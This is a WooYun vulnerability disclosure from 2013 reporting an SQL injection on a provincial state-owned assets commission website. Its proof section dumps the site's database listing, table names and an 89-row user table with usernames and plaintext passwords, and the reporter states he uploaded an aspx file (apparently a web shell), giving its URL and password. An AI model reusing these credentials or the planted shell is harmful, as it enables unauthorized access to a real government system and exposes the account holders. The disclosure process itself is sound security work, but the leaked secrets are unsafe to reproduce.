当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045185

漏洞标题:某省国有资产监督管理委员会SQL注射漏洞可能导致getshell

相关厂商:某省国有资产监督管理委员会

漏洞作者: 雅柏菲卡

提交时间:2013-12-10 19:00

修复时间:2014-01-24 19:00

公开时间:2014-01-24 19:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-10: 细节已通知厂商并且等待厂商处理中
2013-12-14: 厂商已经确认,细节仅向厂商公开
2013-12-24: 细节向核心白帽子及相关领域专家公开
2014-01-03: 细节向普通白帽子公开
2014-01-13: 细节向实习白帽子公开
2014-01-24: 细节向公众公开

简要描述:

..........

详细说明:

.......

漏洞证明:

注射点 
available databases [24
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FJGZW
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
Database: FJGZW
[63 tables]
+-------------------------+
| BMXT_DYDT               |
| BMXT_GGXX               |
| BMXT_KCKS               |
| BMXT_KSXX               |
| BMXT_QYPZ               |
| BMXT_UINFO              |
| BMXT_ZKZ                |
| CANDIDATES              |
| CANDIDATESJOB           |
| CATALOG_APPLY           |
| CATALOG_INFOS           |
| COLUMN_CONFIG           |
| COLUMN_DROPDOWNLIST     |
| COLUMN_PARAMCONFIG      |
| COMM_INTERVIEW_ADDTITLE |
| COMM_INTERVIEW_COTTEN   |
| COMM_INTERVIEW_PHOTOS   |
| COMM_LETTER             |
| COMM_OFTENQUESTION      |
| COMM_VOTE               |
| COMM_VOTEITEM           |
| DATADEPORT_NEWSTYPE     |
| ECONOMY_INFO            |
| ECONOMY_PAGEPARAMCONFIG |
| ECONOMY_TYPECONFIG      |
| JOB                     |
| LAWBREAK_INFOS          |
| LICENSETABLE_AUDITITEM  |
| LICENSETABLE_INFOS      |
| NETPOLL                 |
| NEWS_ATTACHCOLUMNTYPE   |
| NEWS_INFOS              |
| NEWS_INFOS_DEL          |
| NEWS_PROCESSCONFIG      |
| NEWS_PROSPECIALSATUS    |
| PHOTO                   |
| PHOTOTYPE               |
| POLL_ANSWER             |
| POLL_QUESTION           |
| RECRUITMENT             |
| SYNC_BTBL_CATALOG_APPLY |
| SYNC_BTBL_CATALOG_INFOS |
| SYNC_BTBL_COMM_LETTER   |
| SYNC_BTBL_NEWS_INFOS    |
| SYS_DEPARTMENTINFO      |
| SYS_LOG                 |
| SYS_MENUS               |
| SYS_ROLEMENU            |
| SYS_ROLES               |
| SYS_USERROLE            |
| SYS_USERS               |
| TBIP                    |
| TBVISITLM               |
| TBVISITLOG              |
| TBVISITLOGTEMP          |
| TBVISITLOG_KTC          |
| URL_INFOS               |
| USERINFO                |
| VIEW_INFO               |
| VISIT_COLUMNQUANTITY    |
| VISIT_LOG               |
| VISIT_MONTHREPORT       |
| VISIT_WEBQUANTITY       |
+-------------------------+
Database: FJGZW
Table: SYS_USERS
[89 entries]
+------------+--------------+------------+------------------+--------+---------------+----------------+----------+------------+----------+------------+
| CAUSERNAME | DEPARTMENTID | ERORRLOGON | PASSWORD         | USERID | USERLASTLOGON | USERLOGONTIMES | USERNAME | USERSIGNON | USERTYPE | USERTYPEID |
+------------+--------------+------------+------------------+--------+---------------+----------------+----------+------------+----------+------------+
| NULL       | 1            | 0          | admin8615        | 1      | 05-12         | 5605           | NULL     | admin      | NULL     | T          |
| NULL       | 4            | 0          | 8806             | 108    | 24-6          | 62             | NULL     | cqc        | NULL     | T          |
| NULL       | 5            | 0          | 87668638         | 109    | 15-10         | 211            | NULL     | ghc        | NULL     | T          |
| NULL       | 6            | 0          | 99999            | 110    | 09-10         | 173            | NULL     | ggfpc      | NULL     | T          |
| NULL       | 7            | NULL       | 8888             | 111    | 14-7          | 39             | NULL     | fpc        | NULL     | NULL       |
| NULL       | 8            | 0          | 8888             | 112    | 29-11         | 72             | NULL     | jsh        | NULL     | T          |
| NULL       | 9            | 0          | 8888             | 113    | 21-11         | 89             | NULL     | zzb        | NULL     | T          |
| NULL       | 10           | 0          | 8888             | 114    | 24-10         | 202            | NULL     | jcs        | NULL     | T          |
| NULL       | 11           | 0          | 8888             | 115    | 15-11         | 149            | NULL     | jgdw       | NULL     | T          |
| NULL       | 2            | 0          | 8888             | 116    | 05-12         | 280            | NULL     | fgc        | NULL     | NULL       |
| NULL       | 13           | 0          | 2128             | 118    | 29-11         | 563            | NULL     | shjt       | NULL     | T          |
| NULL       | 14           | 0          | 8888             | 119    | 06-11         | 1182           | NULL     | qfkg       | NULL     | T          |
| NULL       | 30           | 0          | 8888             | 120    | 04-12         | 1195           | NULL     | jtjt       | NULL     | T          |
| NULL       | 15           | 0          | 87553584         | 121    | 03-12         | 656            | NULL     | yjkg       | NULL     | T          |
| NULL       | 16           | 0          | 8888             | 122    | 29-11         | 119            | NULL     | cbjt       | NULL     | T          |
| NULL       | 17           | 0          | 123456           | 123    | 27-11         | 375            | NULL     | qcjt       | NULL     | T          |
| NULL       | 29           | 0          | bgs666           | 124    | 04-12         | 1017           | NULL     | jgjt       | NULL     | T          |
| NULL       | 18           | 0          | 8888             | 125    | 05-12         | 1007           | NULL     | nyjt       | NULL     | NULL       |
| NULL       | 191          | 0          | 87812919         | 127    | 16-9          | 86             | NULL     | cqzx       | NULL     | NULL       |
| NULL       | 20           | 0          | fidc2942         | 128    | 05-12         | 1514           | NULL     | tzjt       | NULL     | T          |
| NULL       | 21           | 0          | 123456           | 130    | 06-12         | 449            | NULL     | wmjt       | NULL     | T          |
| NULL       | 22           | 0          | 8888             | 131    | 27-11         | 346            | NULL     | hmjt       | NULL     | T          |
| NULL       | 23           | 0          | 70771900         | 132    | 04-12         | 599            | NULL     | gsgl       | NULL     | NULL       |
| NULL       | 24           | 0          | 1119             | 133    | 03-12         | 435            | NULL     | zljt       | NULL     | T          |
| NULL       | 25           | 0          | 8888             | 134    | 04-12         | 1479           | NULL     | jdkg       | NULL     | T          |
| NULL       | 26           | 0          | 666888           | 136    | 04-12         | 372            | NULL     | dzjt       | NULL     | T          |
| NULL       | 14           | NULL       | 8888             | 137    | NULL          | NULL           | NULL     | qfkgrs     | NULL     | NULL       |
| NULL       | 28           | NULL       | 8888             | 138    | 26-4          | 68             | NULL     | hqsy       | NULL     | T          |
| NULL       | 31           | 0          | 8888             | 139    | 26-11         | 241            | NULL     | fzgzw      | NULL     | T          |
| NULL       | 32           | 0          | xmgzw520         | 140    | 05-12         | 594            | NULL     | xmgzw      | NULL     | T          |
| NULL       | 33           | 0          | 8888             | 141    | 05-12         | 411            | NULL     | zzgzw      | NULL     | T          |
| NULL       | 34           | 0          | 28008990         | 142    | 06-12         | 1477           | NULL     | qzgzw      | NULL     | T          |
| NULL       | 35           | 0          | 8888             | 143    | 22-11         | 388            | NULL     | smgzw      | NULL     | T          |
| NULL       | 36           | 0          | 12345678         | 144    | 24-10         | 389            | NULL     | ptgzw      | NULL     | T          |
| NULL       | 37           | 0          | 8868202          | 145    | 23-10         | 122            | NULL     | npgzw      | NULL     | T          |
| NULL       | 38           | 0          | LYGZ05972105136  | 187    | 04-12         | 319            | NULL     | lygzw      | NULL     | T          |
| NULL       | 39           | 0          | 172507           | 207    | 11-12         | 21             | NULL     | ndgzw      | NULL     | T          |
| NULL       | 241          | NULL       | 8888             | 227    | 21-6          | 1              | NULL     | qjjt       | NULL     | NULL       |
| NULL       | 3            | 0          | 87668622         | 268    | 12-11         | 121            | NULL     | tpc        | NULL     | T          |
| NULL       | 242          | NULL       | 8888             | 287    | 21-6          | 1              | NULL     | sazgs      | NULL     | NULL       |
| NULL       | 243          | NULL       | 8888             | 288    | 21-6          | 1              | NULL     | jzsjy      | NULL     | NULL       |
| NULL       | 244          | NULL       | 8888             | 289    | 21-6          | 1              | NULL     | jzkxy      | NULL     | NULL       |
| NULL       | 245          | NULL       | 8888             | 290    | 21-6          | 1              | NULL     | nfgf       | NULL     | NULL       |
| NULL       | 246          | NULL       | 8888             | 291    | 21-6          | 1              | NULL     | hmtz       | NULL     | NULL       |
| NULL       | 247          | NULL       | 8888             | 292    | 21-6          | 1              | NULL     | hsgq       | NULL     | NULL       |
| NULL       | 13           | NULL       | 8888             | 293    | 02-9          | 1              | NULL     | shjtrs     | NULL     | NULL       |
| NULL       | 15           | NULL       | 8888             | 294    | NULL          | NULL           | NULL     | yjkgrs     | NULL     | NULL       |
| NULL       | 16           | NULL       | 8888             | 295    | NULL          | NULL           | NULL     | cbjtrs     | NULL     | NULL       |
| NULL       | 17           | NULL       | 8888             | 296    | NULL          | NULL           | NULL     | qcjtrs     | NULL     | NULL       |
| NULL       | 18           | NULL       | 8888             | 297    | NULL          | NULL           | NULL     | nyjtrs     | NULL     | NULL       |
| NULL       | 20           | NULL       | 8888             | 298    | NULL          | NULL           | NULL     | tzjtrs     | NULL     | NULL       |
| NULL       | 21           | NULL       | 8888             | 299    | NULL          | NULL           | NULL     | wmjtrs     | NULL     | NULL       |
| NULL       | 22           | NULL       | 8888             | 300    | NULL          | NULL           | NULL     | hmjtrs     | NULL     | NULL       |
| NULL       | 23           | NULL       | 8888             | 301    | NULL          | NULL           | NULL     | gsglrs     | NULL     | NULL       |
| NULL       | 235          | 0          | 8888             | 302    | 24-10         | 2              | NULL     | gwjt       | NULL     | NULL       |
| NULL       | 236          | NULL       | 8888             | 307    | 21-6          | 1              | NULL     | fjsl       | NULL     | NULL       |
| NULL       | 237          | NULL       | 8888             | 308    | 21-6          | 1              | NULL     | myzgs      | NULL     | NULL       |
| NULL       | 238          | NULL       | 8888             | 309    | 21-6          | 1              | NULL     | sgjt       | NULL     | NULL       |
| NULL       | 239          | NULL       | 8888             | 310    | 21-6          | 1              | NULL     | nply       | NULL     | NULL       |
| NULL       | 240          | NULL       | 8888             | 311    | 21-6          | 1              | NULL     | xmwy       | NULL     | NULL       |
| NULL       | 211          | NULL       | 8888             | 312    | 17-1          | 6              | NULL     | xfb        | NULL     | NULL       |
| NULL       | 231          | NULL       | 8888             | 313    | 21-6          | 1              | NULL     | dndh       | NULL     | NULL       |
| NULL       | 232          | NULL       | 8888             | 314    | 21-6          | 1              | NULL     | mzwlj      | NULL     | NULL       |
| NULL       | 233          | NULL       | 8888             | 315    | 19-8          | 2              | NULL     | fjnz       | NULL     | NULL       |
| NULL       | 234          | NULL       | 8888             | 316    | 19-8          | 2              | NULL     | qszy       | NULL     | NULL       |
| NULL       | 0            | NULL       | 8888             | 317    | NULL          | NULL           | NULL     | hsgq       | NULL     | NULL       |
| NULL       | 248          | NULL       | 8888             | 318    | 21-6          | 1              | NULL     | bgzb       | NULL     | NULL       |
| NULL       | 251          | 0          | 8888             | 319    | 21-11         | 263            | NULL     | zhc        | NULL     | NULL       |
| NULL       | 1            | 0          | fjzzbxy1         | 320    | 22-11         | 363            | NULL     | xy         | NULL     | NULL       |
| NULL       | 24           | NULL       | 8888             | 321    | NULL          | NULL           | NULL     | zljtrs     | NULL     | NULL       |
| NULL       | 249          | NULL       | 8888             | 322    | 21-6          | 1              | NULL     | hxkh       | NULL     | NULL       |
| NULL       | 250          | NULL       | 8888             | 323    | 21-6          | 1              | NULL     | shhg       | NULL     | NULL       |
| NULL       | 25           | NULL       | 8888             | 324    | NULL          | NULL           | NULL     | jdkgrs     | NULL     | NULL       |
| NULL       | 26           | NULL       | 8888             | 325    | NULL          | NULL           | NULL     | dzjtrs     | NULL     | NULL       |
| NULL       | 28           | NULL       | 8888             | 326    | NULL          | NULL           | NULL     | hqsyrs     | NULL     | NULL       |
| NULL       | 29           | NULL       | 8888             | 327    | NULL          | NULL           | NULL     | jgjtrs     | NULL     | NULL       |
| NULL       | 30           | NULL       | 8888             | 347    | NULL          | NULL           | NULL     | jtjtrs     | NULL     | NULL       |
| NULL       | 1            | 3          | YUANX13489102884 | 367    | 18-9          | 168            | NULL     | yuanx      | NULL     | NULL       |
| NULL       | 0            | NULL       | 8888             | 368    | NULL          | NULL           | NULL     | jdzb       | NULL     | NULL       |
| NULL       | 311          | 0          | fjzb1503         | 387    | 29-11         | 217            | NULL     | jdzb       | NULL     | NULL       |
| NULL       | 9            | NULL       | 607607           | 407    | 29-1          | 182            | NULL     | zflgw1     | NULL     | NULL       |
| NULL       | 2            | NULL       | 888888           | 408    | 27-2          | 54             | NULL     | zflgw2     | NULL     | NULL       |
| NULL       | 13           | NULL       | 87521108         | 427    | 10-11         | 70             | NULL     | NULL       | NULL     | NULL       |
| NULL       | 16           | NULL       | 888888           | 428    | 07-11         | 34             | NULL     | NULL       | NULL     | NULL       |
| NULL       | 17           | NULL       | 87816956         | 429    | 19-10         | 17             | NULL     | NULL       | NULL     | NULL       |
| NULL       | 29           | NULL       | fjjghr           | 430    | 31-12         | 46             | NULL     | NULL       | NULL     | NULL       |
| NULL       | 28           | NULL       | 379165           | 431    | 27-10         | 52             | NULL     | NULL       | NULL     | NULL       |
| NULL       | 9            | NULL       | 8888             | 447    | NULL          | NULL           | NULL     | zflgw3     | NULL     | NULL       |
| NULL       | 0            | NULL       | 8888             | 567    | NULL          | NULL           | NULL     | NULL       | NULL     | NULL       |
+------------+--------------+------------+------------------+--------+---------------+----------------+----------+------------+----------+------------+
http://www.fjgzw.gov.cn/admin/News/NewsInfo/ViewPhoto.aspx?newsid=108130 我之前上传了一个aspx的小文件
http://www.fjgzw.gov.cn/UploadFile/newsphoto/201312061216334076.aspx是那个文件
QQ截图20131206235031.png



密码 admin



QQ截图20131206235047.png

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-12-14 20:41

厂商回复:

最新状态:

暂无